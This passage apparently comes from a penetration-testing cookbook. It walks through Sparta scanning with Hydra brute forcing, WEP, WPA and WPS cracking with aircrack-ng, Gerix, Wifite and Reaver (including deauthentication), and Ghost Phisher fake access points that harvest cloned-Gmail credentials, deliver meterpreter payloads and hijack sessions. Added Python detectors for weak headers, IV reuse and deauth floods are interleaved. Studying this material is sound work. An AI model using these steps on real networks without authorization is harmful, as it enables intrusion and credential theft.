Here are the links that will be helpful, and they contain a list of all filters in Wireshark. These filters can 
come in handy when performing in-depth packet analysis: 


• https://wiki.wireshark.org/CaptureFilters
• https://wiki.wireshark.org/FrontPage


This is Sparta! 


Sparta is a GUI-based Python tool that is useful for infrastructure pentesting. It helps with scanning and enumeration, and we can even import nmap output into it. Sparta is easy to use and automates much of the information gathering. In this recipe, you will learn how to use the tool to perform various scans on the network.


Getting ready 


Kali already has the tool preinstalled, so let's look at how to run it! 


How to do it... 


To know more about Sparta, follow the given steps: 


1. We start by typing the sparta command: 


[Screenshot: SPARTA 1.0.2 (BETA) - untitled - /root/Desktop/, with File and Help menus, Scan and Brute tabs, the Hosts | Services | Tools pane on the left reading "Click here to add host(s) to scope", and the Services | Scripts | Information | Notes pane on the right]


We will see the tool open up. 
2. Now we click on the left-hand side of the menu pane to add hosts: 


[Screenshot: the Add host(s) to scope dialog: an IP Range field (eg: 192.168.1.0/24 10.10.10.10-20 1.2.3.4), the checkboxes Run nmap host discovery and Run staged nmap scan, and the buttons Cancel and Add to scope]





3. In the window, we enter the IP range we want to scan.
4. Once we click on Add to scope, it automatically starts the basic process of running nmap, nikto, and so on:


Host          Start time            End time  Status
192.168.1.9   15 Feb 2017 00:42:28            Running
192.168.1.1   15 Feb 2017 00:42:28            Running
192.168.1.11  15 Feb 2017 00:42:28            Running


5. We can see the discovered hosts on the left-hand side pane: 


6. On the right-hand side, in the Services tab, we will see the open ports and the services they are running:


[Screenshot: the tab bar Services | Scripts | Information | Notes | nikto (80/tcp)]


7. Switching to the Nikto tab, we will see the output of Nikto being displayed for our selected host: 





[Screenshot: the Hosts | Services | Tools pane listing 192.168.1.1, 192.168.1.12 and 192.168.1.13; the Services tab for the selected host, with nikto (80/tcp) and screenshot (80/tcp) tabs:]

Port  Protocol  State  Name  Version
80    tcp       open   http  nginx 1.6.2

[nikto (80/tcp) output:]
+ Server: nginx/1.6.2
+ Server leaks inodes via ETags, header found with file /, fields: 0x588 [...]
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to [...] forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the [...] site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7535 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2017-02-15 00:43:57 (GMT3) (55 seconds)
+ 1 host(s) tested
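The nikto findings above are all response-header checks, so they are easy to reproduce in a monitoring script of your own. As an added example (not code from the book, Sparta or nikto), the following Python function reports the same classes of finding for a set of response headers, with a constructed weak header set beside a hardened one; the heuristics (a digit in the Server value, an Apache-style inode-size-mtime ETag) and the function names are mine:

```python
import re
from typing import Dict, List

# Constructed response headers for two servers (not captured from the book's lab).
# The first mirrors the kind of nginx response nikto complained about above.
WEAK_HEADERS = {
    "Server": "nginx/1.6.2",
    "ETag": '"588-1f6-54c2d0c1"',        # inode-size-mtime structure
    "Content-Type": "text/html",
}
HARDENED_HEADERS = {
    "Server": "nginx",
    "ETag": '"a3f1c9e2b4d5"',            # opaque hash, nothing to infer from it
    "Content-Type": "text/html",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "0",             # set explicitly; CSP is the modern control
    "Content-Security-Policy": "default-src 'self'",
}

# Three hex fields joined by '-' is the FileETag INode MTime Size layout.
INODE_ETAG = re.compile(r'^(W/)?"?[0-9a-f]+-[0-9a-f]+-[0-9a-f]+"?$', re.I)


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return one finding per weak or missing header, nikto style."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []
    server = h.get("server", "")
    if re.search(r"\d", server):
        findings.append(f"Server header discloses a version: {server}")
    if "etag" in h and INODE_ETAG.match(h["etag"].strip()):
        findings.append("ETag looks like inode-size-mtime: leaks inode numbers")
    csp = h.get("content-security-policy", "")
    if "x-frame-options" not in h and "frame-ancestors" not in csp:
        findings.append("X-Frame-Options (or CSP frame-ancestors) missing: clickjacking possible")
    if "x-xss-protection" not in h:
        findings.append("X-XSS-Protection not set (nikto flags it; prefer a Content-Security-Policy)")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing: browsers may MIME-sniff responses")
    return findings


if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(name, len(audit_headers(hdrs)), "finding(s)")
        for f in audit_headers(hdrs):
            print("  +", f)
```

Feed it the headers from any HTTP client (for example the dict returned by a requests response) to re-check a host after the fix has been deployed.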


8. We can also see the screenshot of the page running on port 80 on the host:

















[Screenshot: the screenshot (80/tcp) tab showing the captured page, a Google sign-in form ("One account. All of Google." / "Sign in with your Google Account" / "Enter your email")]

9. For services such as FTP, it automatically runs tools such as Hydra to brute force the logins: 














[Screenshot: the ftp-default (21/tcp) tab with the Hydra output:]

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-02-15 00:45:43
[DATA] max 10 tasks per 1 server, overall 64 tasks, 10 login tries, ~0 tries per task
[DATA] attacking service ftp on port 21
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
[STATUS] 138.00 tries/min, 138 tries in 00:01h, 4294967168 todo in 1193046:28h, 10 active
The session file ./hydra.restore was written. Type "hydra -R" to resume session.


10. On the left-hand side pane, on switching to Tools tab, we can see the output of every host toolwise. 
11. We can also perform a custom brute force attack by switching to the Brute tab: 


[Screenshot: the Brute tab: IP 127.0.0.1, Port 22, Service ssh, Run; options Try blank password, Try login as password, Loop around users, Exit on first valid, Verbose, Additional Options; Username (root) or Username list / Found usernames; Password (password) or Password list / Found passwords; Threads 16]

12. To run a full port scan or a unicornscan, we can right-click on the host, go to the Portscan menu, and choose the type of scan we want to run on the host:







[Screenshot: right-clicking a host (192.168.1.1) in the Hosts pane opens a menu with Mark as checked and a Portscan submenu: Run unicornscan (full UDP), Run nmap (top 1000 quick UDP), Run nmap (full UDP), Run nmap (full TCP), Run nmap (fast UDP), Run nmap (fast TCP), Run nmap (staged)]


Wireless Attacks — Getting Past Aircrack-ng 


In this chapter, we will cover the following recipes: 


• The good old Aircrack
• Hands on with Gerix
• Dealing with WPAs
• Owning an employee account with Ghost Phisher
• Pixie dust attack


Introduction 


As described on their official website: 


"Aircrack-ng is a complete suite of tools to assess Wi-Fi network security.
It focuses on different areas of Wi-Fi security:

• Monitoring: Packet capture and export of data to text files for further processing by third party tools
• Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
• Testing: Checking Wi-Fi cards and driver capabilities (capture and injection)
• Cracking: WEP and WPA PSK (WPA 1 and 2)"


The good old Aircrack 


Aircrack is a software suite for wireless networks that consists of a network detector, a packet sniffer, and a WEP/WPA2 cracker. It is open source and is built for 802.11 wireless LANs (for more information, visit https://en.wikipedia.org/wiki/IEEE_802.11). It consists of various tools, such as aircrack-ng, airmon-ng, airdecap, aireplay-ng, packetforge-ng, and so on.


In this recipe, we will cover the basics of cracking wireless networks with the Aircrack suite. You will learn to use tools such as airmon-ng, aircrack-ng, airodump-ng, and so on to crack the password of wireless networks around us.


Getting ready 


We will need Wi-Fi hardware that supports packet injection. The Alfa card by Alfa Networks, the TP-Link TL-WN821N, and the EDIMAX EW-7811UTC AC600 are some of the cards we can use. In this recipe, we are using an Alfa card.


How to do it... 


The following steps demonstrate the use of the Aircrack suite:


1. We type the airmon-ng command to check whether our card has been detected by Kali: 


root@kali:~# airmon-ng

PHY     Interface   Driver      Chipset

phy1    wlan0mon    rt2800usb   Ralink Technology, Corp. RT2870/RT3070





2. Next, we need to set our adapter to the monitor mode by using the following command: 


airmon-ng start wlan0mon


The following screenshot shows the output of the preceding command: 


root@kali:~# airmon-ng start wlan0mon

PHY     Interface   Driver      Chipset

phy1    wlan0mon    rt2800usb   Ralink Technology, Corp. RT2870/RT3070

                (mac80211 monitor mode already enabled for [phy1]wlan0mon on [phy1]10)





3. Now, in order to see what routers are running in the neighborhood, we use the following command:


airodump-ng wlan0mon


The following screenshot shows the output of the preceding command: 


CH  9 ][ Elapsed: 42 s ][ 2017-02-27 01:33

[Screenshot: airodump-ng output with the columns BSSID, PWR, Beacons, #Data, #/s, CH, MB, ENC, CIPHER, AUTH and ESSID. Signal levels range from -33 to -73. Most networks use CCMP or TKIP with PSK authentication (DIRECT-XG-BRAVIA, XSS, Anubha, AMAN, Hiker, Naoko, triband, GokulsDiner, KRITIKA, Akshay, Maximum, Tenda_B32138, TP-LINK_EF1A, Batman, varun_EXT, Neha); one network, MGMNT, uses WEP]
4. Here, we note the BSSID of the network we want to crack; in our case, it's B8:C1:A2:07:BC:F1 and the channel number is 9. We stop the process by pressing Ctrl + C and leave the window open.


5. Now we capture the packets using airodump-ng with the -w switch to write these packets to a file: 


airodump-ng -w packets -c 9 --bssid B8:C1:A2:07:BC:F1 wlan0mon


The following screenshot shows the output of the preceding command:


root@kali: ~

CH  9 ][ Elapsed: 30 s ][ 2017-02-27 01:41

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

B8:C1:A2:07:BC:F1  -76  19      116     [..]  [..]   9  54   WEP  WEP         MGMNT

BSSID              STATION            PWR   Rate    Lost    Frames  Probe





6. Now we need to watch the Beacons and #Data columns; these numbers start from 0 and increase as packets pass between the router and other devices. We need at least 20,000 initialization vectors to successfully crack the Wired Equivalent Privacy (WEP) password.

7. To speed up the process, we open another Terminal window, run aireplay-ng, and perform a fake authentication using this command:


aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <OUR MAC> wlan0mon
{fake authentication}


The following screenshot shows an example of the preceding command: 


root@kali:~# aireplay-ng -1 0 -e MGMNT -a B8:C1:A2:07:BC:F1 -h 00:c0:ca:57:cd:fc wlan0mon
Waiting for beacon frame (BSSID: B8:C1:A2:07:BC:F1) on channel 9

Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)





8. Now let's do the ARP packet replay using the following command: 


aireplay-ng -3 -b <AP MAC> wlan0mon


The following screenshot shows an example of the preceding command: 


root@kali:~# aireplay-ng -3 -b B8:C1:A2:07:BC:F1 wlan0mon
No source MAC (-h) specified. Using the device MAC (00:C0:CA:57:CD:FC)
01:56:34  Waiting for beacon frame (BSSID: B8:C1:A2:07:BC:F1) on channel 9
Saving ARP requests in replay_arp-0227-015634.cap
You should also start airodump-ng to capture replies.
Read 7968 packets (got 24 ARP requests and 75 ACKs), sent 120 packets...
Read 8083 packets (got 43 ARP requests and 109 ACKs), sent 170 packets...
Read 8213 packets (got 57 ARP requests and 142 ACKs), sent 219 packets...
Read 8341 packets (got 80 ARP requests and 173 ACKs), sent 270 packets...
Read 8444 packets (got 84 ARP requests and 203 ACKs), sent 320 packets...
Read 8576 packets (got 99 ARP requests and 237 ACKs), sent 370 packets...
[... the counters keep climbing; the last visible line reads 9307 packets with 200 ARP requests]





9. Once we have enough packets, we start aircrack-ng and provide the filename where we saved the packets:


aircrack-ng filename.cap


The following screenshot shows an example of the preceding command: 


Aircrack-ng 1.2 rc3

[00:00:20] Tested 1209601 keys (got 9983 IVs)

[Screenshot: the KB / depth / byte(vote) table that lists, for each key byte 0 to 12, the candidate values with their vote counts, e.g. 2A(15616) 2E(14080) for the first key byte]
10. Once cracked, we should see the password on screen:


[00:00:00] 1 keys tested (1020.67 k/s)

KEY FOUND! [ Cisco123 ]

[Screenshot: below the key, Aircrack-ng prints partial hex dumps labelled Transient Key and EAPOL HMAC]





How it works... 


The idea behind this attack is to capture as many packets as possible. Each WEP data packet carries a 3-byte Initialization Vector (IV). We simply capture as many IVs as we can and then use Aircrack on them to recover the password.
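To make the How it works section concrete, here is an added Python example (not from the book or the Aircrack suite) that pulls the 3-byte IV out of WEP-protected 802.11 data frames, reports IVs that repeat within a capture, and computes the birthday bound that explains why a 24-bit IV space is exhausted so quickly on a busy network. The frames are constructed in the code; the helper names (wep_iv, iv_reuse_report, make_wep_frame) are mine:

```python
import math
from collections import Counter
from typing import Dict, Iterable, List, Optional

IV_BITS = 24  # a WEP IV is 3 bytes


def wep_iv(frame: bytes) -> Optional[bytes]:
    """Return the 3-byte IV of a WEP-protected 802.11 data frame, else None.

    Layout (FCS stripped): Frame Control (2) | Duration (2) | Addr1..3 (18) |
    Sequence Control (2) [| Addr4 (6) when To-DS and From-DS are both set]
    [| QoS Control (2) for QoS Data subtypes], then IV (3), key-id byte (1),
    ciphertext and the 4-byte ICV.
    """
    if len(frame) < 2:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x03 != 2:      # type field: 2 = data frame
        return None
    if not fc1 & 0x40:              # Protected Frame flag clear: not encrypted
        return None
    hdr = 24
    if (fc1 & 0x03) == 0x03:        # To-DS + From-DS: fourth address present
        hdr += 6
    if fc0 & 0x80:                  # QoS data subtypes carry a QoS Control field
        hdr += 2
    if len(frame) < hdr + 4 + 4:    # IV + key id + at least the ICV
        return None
    return frame[hdr:hdr + 3]


def iv_reuse_report(frames: Iterable[bytes]) -> Dict[str, object]:
    """Count IVs across captured frames and list the ones that repeat."""
    counts: Counter = Counter()
    for frame in frames:
        iv = wep_iv(frame)
        if iv is not None:
            counts[iv.hex()] += 1
    return {
        "encrypted_frames": sum(counts.values()),
        "unique_ivs": len(counts),
        "reused": {iv: n for iv, n in counts.items() if n > 1},
    }


def expected_frames_until_iv_repeat(bits: int = IV_BITS) -> int:
    """Birthday bound: with N = 2**bits IVs drawn at random, the first repeat is
    expected after about sqrt(pi * N / 2) frames (roughly 5,100 for WEP), so a
    busy WEP network reuses keystreams within seconds to minutes."""
    return round(math.sqrt(math.pi * 2 ** bits / 2))


def make_wep_frame(iv: bytes, encrypted: bool = True, qos: bool = False) -> bytes:
    """Constructed test frame (not a real capture): From-DS data frame with dummy
    addresses, optional Protected flag and QoS Control, an 8-byte body and ICV."""
    fc = bytes([0x88 if qos else 0x08, 0x02 | (0x40 if encrypted else 0)])
    header = fc + b"\x00\x00" + bytes(range(6)) * 3 + b"\x10\x00"
    if qos:
        header += b"\x00\x00"
    return header + iv + b"\x00" + b"\xAA" * 8 + b"\xBB" * 4


def sample_capture() -> List[bytes]:
    """Constructed capture: two frames reusing IV 010203, one QoS frame with a
    fresh IV, one unencrypted data frame, and one beacon (management) frame."""
    beacon = bytes([0x80, 0x00]) + b"\x00" * 22 + b"\x00" * 12
    return [
        make_wep_frame(b"\x01\x02\x03"),
        make_wep_frame(b"\x01\x02\x03"),
        make_wep_frame(b"\xaa\xbb\xcc", qos=True),
        make_wep_frame(b"\x01\x02\x03", encrypted=False),
        beacon,
    ]


if __name__ == "__main__":
    print(iv_reuse_report(sample_capture()))
    print("expected frames until an IV repeats:", expected_frames_until_iv_repeat())
```

The report counts only the three protected data frames (the beacon and the plaintext frame carry no IV) and flags the repeated IV, while the bound shows that a repeat is expected after only a few thousand frames, far fewer than the 20,000 IVs the recipe collects.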


Hands on with Gerix


In the previous recipe, you learned how to use the Aircrack suite to crack WEP. In this recipe, we will use a GUI-based tool, Gerix, which wraps the Aircrack suite and makes a wireless network audit much easier. Gerix is a Python-based tool built by J4r3tt.


Getting ready 


Let's install Gerix using the following command: 


git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git


How to do it... 


The following steps demonstrate the use of Gerix: 


1. Once it's downloaded, we go to the directory where it's downloaded and run the following command:


cd gerix-wifi-cracker-2


2. We run the tool using the following command:


python gerix.py


The preceding commands can be seen in the following screenshot:


root@kali:~# git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git
Cloning into 'gerix-wifi-cracker-2'...
remote: Counting objects: 48, done.
remote: Total 48 (delta 0), reused 0 (delta 0), pack-reused 48
Unpacking objects: 100% (48/48), done.
Checking connectivity... done.
root@kali:~# cd gerix-wifi-cracker-2/
root@kali:~/gerix-wifi-cracker-2# python gerix.py





3. Once the window opens, we click on Enable/Disable Monitor Mode in the Configuration tab as 
shown in the following screenshot: 


[Screenshot: Gerix wifi cracker 2, Configuration tab (other tabs: Welcome, WEP, WPA, Fake AP, Cracking, Database, Credits). Directory for session files: /root/.gerix-wifi-cracker/ with Clean old session files. Select the interface: wlan0mon, 00:c0:ca:57:..., Ralink Technology, rt2800usb, Monitor. Buttons: Reload wireless interfaces, Set random MAC address, Enable/Disable Monitor Mode. Select the target network (Essid, Bssid, Channel, Signal, Enc), Channel: all channels, Seconds: 10, Rescan networks. Status: 04:16:53 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success]]





4. Then, we click on Rescan networks: 





[Screenshot: the Configuration tab after Rescan networks. Select the target network:]

    Essid          Bssid            Channel  Signal  Enc
1   Tenda_0E01...  C8:3A:35:0E...   7        -80     WPA CCMP ...
2   HCLMI          B8:C1:A2:1A...   8        -80     WPA CCMP ...
3   SDMANDIR       54:B8:0A:95...   1        -78     WPA2 CCMP ...

Channel: all channels   Seconds: 10   Rescan networks





5. This will show us the list of access points available and the type of authentication they use. We 
select the one with WPA and then switch to the WPA tab. 
6. Here, we click on General functionalities and then we click on Start Capturing: 


[Screenshot: the WPA tab, "Welcome in WPA Attacks Control Panel". General functionalities: Start Sniffing and Logging. Tests: Performs a test of injection AP]





7. Since the WPA attack requires the handshake to be captured, we need a station to be already connected to the access point. So, we click on Autoload victim clients or enter a custom victim MAC:


[Screenshot: the WPA handshake attack panel: Add victim client MAC (94:53:30:68:2E:A2), the Autoload victim clients button, Add the deauth number (4), the note "Now you need to capture the HandShake, start the deauthentication", and the Client deauthentication button]





8. Next, we choose the deauth number. We choose 0 here in order to perform a continuous deauthentication attack, and click on the Client deauthentication button:


[Screenshot: the same WPA attacks panel with the victim client MAC selected, the deauth number set, and the Client deauthentication button]





9. We should see a window pop up, which performs deauthentication for us: 


[Screenshot: a terminal window running bash -c "aireplay-ng -0 0 -a 3C:1E:04:91:[...] -c 94:53:3[...]" and sending deauthentication frames to the client]


And in the airodump window, we should see that the handshake has been captured. 


10. Now that we are ready to crack the WPA, we switch to the WEP cracking tab, and in the WPA 
bruteforce cracking, we give a path to our dictionary and click on Aircrack-ng - Crack WPA 
password: 


[Screenshot: the Cracking tab, "Welcome in Cracking Control Panel", with WEP cracking and WPA bruteforce cracking sections. Normal cracking: Add your dictionary (/root...), Aircrack-ng - Crack WPA password. Pyrit cracking (for use it you need to install pyrit support): Add your dictionary, Crack the password with pyrit]





11. We should see the Aircrack window, and it will show us the password when it has been cracked: 


[Screenshot: the Aircrack-ng window showing the recovered key followed by the EAPOL HMAC line]





12. Similarly, this tool can be used to crack WEP/WPA2 networks as well. 
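The Client deauthentication step and the aireplay-ng -0 window in this recipe put a burst of deauthentication frames on the air, which is also exactly what a wireless IDS watches for. As an added defender-side example (not code from the book or Gerix), the following Python code parses 802.11 deauthentication frames and alerts when one BSSID is named in more than a threshold of them within a short window; the capture is constructed inline and the helper names (parse_deauth, detect_deauth_flood, make_deauth) are mine:

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

BROADCAST = b"\xff" * 6


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_deauth(frame: bytes) -> Optional[Tuple[bytes, bytes, bytes, int]]:
    """Return (receiver, transmitter, bssid, reason_code) for an 802.11
    deauthentication frame (type 0 management, subtype 12), else None.

    Header: Frame Control (2) | Duration (2) | Addr1 | Addr2 | Addr3 |
    Sequence Control (2), followed by the 2-byte little-endian reason code.
    """
    if len(frame) < 26:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x03 != 0 or (fc0 >> 4) != 0x0C:
        return None
    reason = int.from_bytes(frame[24:26], "little")
    return frame[4:10], frame[10:16], frame[16:22], reason


def detect_deauth_flood(events: Iterable[Tuple[float, bytes]],
                        window_s: float = 1.0,
                        threshold: int = 5) -> List[Dict[str, object]]:
    """Alert once per BSSID when more than `threshold` deauthentication frames
    naming that BSSID arrive within any `window_s`-second window.
    `events` are (timestamp_seconds, raw_frame) pairs from a monitor-mode capture."""
    recent: Dict[bytes, List[float]] = defaultdict(list)
    alerted = set()
    alerts: List[Dict[str, object]] = []
    for ts, frame in sorted(events, key=lambda e: e[0]):
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        receiver, _transmitter, bssid, reason = parsed
        times = recent[bssid]
        times.append(ts)
        while ts - times[0] > window_s:       # slide the window forward
            times.pop(0)
        if len(times) > threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": mac_str(bssid), "frames_in_window": len(times),
                           "first_ts": times[0], "last_ts": ts,
                           "broadcast": receiver == BROADCAST, "reason": reason})
    return alerts


def make_deauth(bssid: bytes, client: bytes, reason: int = 7) -> bytes:
    """Constructed deauthentication frame from the AP address to one client
    (reason 7: class 3 frame received from a non-associated station)."""
    fc = bytes([0xC0, 0x00])
    return (fc + b"\x00\x00" + client + bssid + bssid + b"\x00\x00"
            + reason.to_bytes(2, "little"))


def sample_events() -> List[Tuple[float, bytes]]:
    """Constructed capture: a burst of 20 deauths against one AP within 0.2 s (how a
    deauthentication attack looks on the air), two legitimate deauths from another
    AP seconds apart, and a beacon. MACs are locally administered dummies."""
    ap_a, ap_b = bytes([0x02, 0, 0, 0, 0, 1]), bytes([0x02, 0, 0, 0, 0, 2])
    client = bytes([0x02, 0, 0, 0, 0, 0x10])
    beacon = bytes([0x80, 0x00]) + b"\x00" * 22 + b"\x00" * 12
    events = [(10.0 + i * 0.01, make_deauth(ap_a, client)) for i in range(20)]
    events += [(10.5, make_deauth(ap_b, client, reason=3)),
               (14.0, make_deauth(ap_b, client, reason=3))]
    events.append((10.05, beacon))
    return events


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_events()):
        print(alert)
```

Only the first access point trips the alert, on the sixth frame of the burst; the two spaced-out deauths from the second AP, the normal way a station is dropped, stay below the threshold. A real deployment would feed it frames from a monitor-mode capture and tune the window and threshold to the site.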


Dealing with WPAs 


Wifite is a Linux-only tool designed to automate the process of a wireless audit. It requires the Aircrack suite, Reaver, Pyrit, and so on to be installed in order to run properly. It comes preinstalled with Kali. In this recipe, you will learn how to use wifite to crack some WPAs.


How to do it... 


To learn about Wifite, follow the given steps:


1. We can start Wifite by typing the following command: 


wifite


The preceding command brings up a list of all the available networks, as shown in the following screenshot:


[Screenshot: wifite scanning for targets (updates at 5 sec intervals; Ctrl + C when ready), listing networks with ESSID, CH, ENCR (WPA2/WPA), POWER (e.g. 22db, 18db), WPS? and CLIENT columns, followed by the count of targets and "3 clients found"]





2. We then press Ctrl + C to stop; it will then ask us to choose the network we want to try cracking:


[Screenshot: the target list after Ctrl + C, including (0C:D2:B5:35:CD:A1) 18db, and the prompt "[+] select target numbers ... separated by commas, or ..."]





3. We enter our number and press Enter. The tool automatically tries different methods to crack the network, and in the end, it will show us the password if it was successfully cracked:


[Screenshot: "[+] target selected.", wifite starting the attack on it, and then "[0:07:55] listening for handshake..."]


We will see the following password: 


[+] starting [...]
[Screenshot: the cracking run, showing the number of keys tested and the recovered key]
[+] disabling monitor mode on [...]
[+] quitting





Owning employee accounts with Ghost Phisher 


Ghost Phisher is a wireless network audit and attack tool that creates a fake access point for a network, fooling a victim into connecting to it. It then assigns an IP address to the victim. The tool can be used to perform various attacks, such as credential phishing and session hijacking, and it can also deliver meterpreter payloads to victims. In this recipe, you will learn how to use the tool to perform phishing attacks, steal cookies, and so on.


How to do it... 


The use of Ghost Phisher can be seen as follows: 


1. We start it using the ghost-phisher command:


[Screenshot: the Ghost Phisher main window with the tabs Fake Access Point, Fake DNS Server, Fake DHCP Server, Fake HTTP Server, GHOST Trap, Session Hijacking, ARP Cache Poisoning, Harvested Credentials and About. The Fake Access Point tab shows Access Point Details (Access Point Name, Channel, IP address, Mac Address, Runtime), the Wireless Interface selector with Refresh Card List (Current Interface, Mac Address, Driver, Monitor), a Status area and a connections graph]
2. Here, we choose our interface and click on Set Monitor: 
[Screenshot: Wireless Interface: wlan0, Refresh Card List; Current Interface: phy[..], Mac Address: 00:c0:ca:57:cd:fd, Driver: rt2800usb, Monitor: Not Started; the Set Monitor button ("click to place wireless card in monitor mode")]


3. Now we enter the details of the access point we want to create: 





[Screenshot: the Access Point Details with a Cryptography section, and the Status log:]

08:19:54 Created tap interface at0
08:19:54 Trying to set MTU on at0 to 1500
08:19:54 Trying to set MTU on wlan0mon to 1800
08:19:55 Access Point with BSSID 00:C0:CA:57:CD:FD started.

Connections:


4. Then, we click on Start to create a new wireless network with that name. 


5. Then, we switch to the Fake DNS Server tab. Here, we need to mention the IP address the victim will be directed to whenever he/she opens any web page:


[Screenshot: the Fake DNS Server tab. DNS Interface Settings: at0 (Current Interface: at0, UDP DNS Port: 53). Query Response Settings: "Resolve all queries to the following address (The currently selected IP address is recommended)" with 192.168.1.2 entered, or "Respond with Fake address only to the following website domains" (Address and Website fields)]


6. We then start the DNS server. 
7. Then, we switch to Fake DHCP Server. Here, we need to make sure that when a victim tries to 
connect, he/she gets an IP address assigned to him/her: 


[Screenshot: the Fake DHCP Server tab. DHCP Version Information: Ghost DHCP Server, Default Port: 67, Protocol: UDP (User Datagram Protocol). DHCP Settings:]

Start: 192.168.1.1          End: 192.168.1.255
Subnet mask: 255.255.255.0  Gateway: 192.168.0.1
Fake DNS: 192.168.1.2       Alt DNS: 192.168.1.2

Status
Started Ghost DHCP Server at Mon Mar 13 08:24:10 2017
android-cc3F23457a889e62 has been leased 192.168.1.2


8. Once this is done, we click on Start to start the DHCP service.


9. If we want to phish someone and capture credentials, we can direct them to our phishing page by setting the options in the Fake HTTP Server tab. Here, we can upload the HTML page we want to be displayed or provide a URL we want it to clone. We start the server:


[Screenshot: the Fake HTTP Server tab. HTTP Interface Settings: at0, 192.168.0.1 (Current Interface: at0, service running; TCP Port: 80, Protocol: HTTP). Webpage Settings: Clone Website: https://gmail.com, or Select Webpage; Real Website IP Address or Url: https://www.gmail.com; Run Webpage on Port (Default HTTP). Service Mode: Credential Capture Mode or Hosting Mode. Status: Starting HTTP Server... Successfully cloned https://gmail.com; captured credentials: Please refer to the Harvested Credential Tab to view captured credentials. Start button]


10. In the next tab, we see Ghost Trap; this feature allows us to perform a Metasploit payload attack, 
which will ask the victim to download our prepared meterpreter payload, and as soon as it is 
executed, we will get a meterpreter connection back. 

11. In the Session Hijacking tab, we can listen for and capture sessions that pass through the network. 
All we need to do here is enter the IP address of the gateway or router and click on Start, and it will 
detect and show any cookies/sessions captured: 


[Screenshot: the Session Hijacking tab. Its description reads: "Fern Cookie Hijacker is an Ethernet and WIFI based session Hijacking tool able to clone remote online web sessions by sniffing and capturing session cookie packets from remote hosts by leveraging various internal MITM attacks with routing capabilities". The tab shows the interface selector (wlan0, Refresh), the Ethernet Mode / Passive Mode options, the Sniffing Status and Cookie Detection Buffer panels ("Internal MITM Engine Activated"), and the "Gateway IP Address / Router IP Address" field with a Start button.]

12. The credentials we captured in the HTTP server can be seen in the Harvested Credentials tab. 


Pixie dust attack 


Wi-Fi Protected Setup (WPS) was introduced in 2006 for home users who wanted to connect to their 
home network without the trouble of remembering complex Wi-Fi passwords. It uses an eight-digit 
PIN to authenticate a client to the network. 

A pixie dust attack is a way of brute forcing the eight-digit PIN. This attack allows the PIN to be recovered 
within minutes if the router is vulnerable, whereas a simple brute force would take hours. In this recipe, 
you will learn how to perform a pixie dust attack. 


The list of vulnerable routers on which the attack will work can be found at https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ309YhXR91A_p7Nnj5Y/edit?pref=2&pli=1#gid=2048815923. 


Getting ready 


We need the network with WPS enabled. Otherwise, it will not work. 


How to do it... 


To learn about pixie dust, follow the given steps: 
1. We start our interface in monitor mode using the following command: 
    airmon-ng start wlan0 
2. Then, we need to find the networks with WPS enabled; we can do that using the following command: 
    wash -i <monitor mode interface> -C 
The following screenshot shows an example of the preceding command: 


    root@kali:~/Desktop# wash -i wlan0mon -C 

    Wash v1.5.2 WiFi Protected Setup Scan Tool 
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> 
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 

    BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID 
    [one row per nearby network; the rows in the screenshot include the ESSIDs Akshay, TP-LINK EF1A and the simpsons] 

3. Now we run reaver using the following command: 


    reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel] 


The following screenshot shows an example of the preceding command: 


    root@kali:~/Desktop# reaver -i wlan0mon -b A4:2B:B0:AD:EF:1A -vv -S -c 6 

    Reaver v1.5.2 WiFi Protected Setup Attack Tool 
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> 
    by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 

    Switching wlan0mon to channel 6 
    Waiting for beacon from A4:2B:B0:AD:EF:1A 
    Associated with A4:2B:B0:AD:EF:1A (ESSID: TP-LINK EF1A) 
    Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 
    WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking 





4. Once it's done, we should see the PIN. 


There's more... 


Here are some great articles which can be referred to while attacking wireless networks: 


• http://www.hackingtutorials.org/wifi-hacking-tutorials/pixie-dust-attack-wps-in-kali-linux-with-reaver/ 
• http://www.kalitutorials.net/2014/04/hack-wpawpa2-wps-reaver-kali-linux.html 


Password Attacks — The Fault in Their Stars 


In this chapter, we will cover the following recipes: 


Identifying different types of hash in the wild! 
Using hash-identifier 

Cracking with patator 

Cracking hashes online 

Playing with John the ripper 

